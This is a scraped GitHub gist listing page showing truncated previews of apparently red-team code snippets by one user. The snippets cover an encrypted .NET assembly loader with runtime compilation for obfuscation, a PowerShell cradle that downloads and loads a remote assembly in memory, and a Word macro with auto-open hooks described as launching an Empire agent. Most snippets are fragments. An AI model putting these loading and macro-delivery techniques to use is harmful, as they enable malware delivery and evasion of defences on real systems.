Skip to content

Instantly share code, notes, and snippets.

Vincent Van Mieghem vivami

Block or report user

Report or block vivami

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
vivami / LoadAndInvoke.cs
Last active Apr 18, 2019
Load Assembly and dynamically create an instance and invoke Main method
View LoadAndInvoke.cs
public static string srcTemplate = @"using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
namespace Loader {
public static class Loader {
private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
vivami / compile.cs
Created Aug 31, 2018
Compile C# src at runtime.
View compile.cs
compile(srcFinal, filename + "_obfuscated.exe");
static void compile(String source, String outfile) {
var provider_options = new Dictionary<string, string>
var provider = new Microsoft.CSharp.CSharpCodeProvider(provider_options);
var compiler_params = new System.CodeDom.Compiler.CompilerParameters();
vivami / encrypt.cs
Last active Aug 31, 2018
Encrypt .NET assembly to string
View encrypt.cs
String path = args[0];
key = getRandomKey();
String filename = Path.GetFileNameWithoutExtension(path).ToString();
String obfuscatedBin = obfuscateBinary(path);
private String obfuscateBinary(String file) {
byte[] assemblyBytes = fileToByteArray(@file);
byte[] encryptedAssembly = encrypt(assemblyBytes, key);
return System.Convert.ToBase64String(encryptedAssembly);
vivami / load-net.ps1
Created Aug 31, 2018
Load remote .NET assembly with PowerShell
View load-net.ps1
$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters=@("arg1", "arg2")
vivami /
Last active Dec 18, 2017
Install additional package for kali
# update kali
apt update && apt upgrade -y
#install java8 for cobalt strike
cd /opt
echo "deb xenial main" | tee /etc/apt/sources.list.d/webupd8team-java.list
echo "deb-src xenial main" | tee -a /etc/apt/sources.list.d/webupd8team-java.list
apt-key adv --keyserver hkp:// --recv-keys eea14886
apt-get -y update
echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | sudo /usr/bin/debconf-set-selections
vivami / Empire_via_rundll-powershdll.vba
Last active Jun 10, 2019
VBA macro executing Empire Agent using PowerShdll via rundll
View Empire_via_rundll-powershdll.vba
Sub AutoOpen()
End Sub
Sub Document_Open()
End Sub
Public Function Debugging() As Variant

Keybase proof

I hereby claim:

  • I am vivami on github.
  • I am vanmieghem ( on keybase.
  • I have a public key whose fingerprint is D90D C025 6090 A35C BD62 C907 32F0 0526 6B85 75C8

To claim this, I am signing this object:

You can’t perform that action at this time.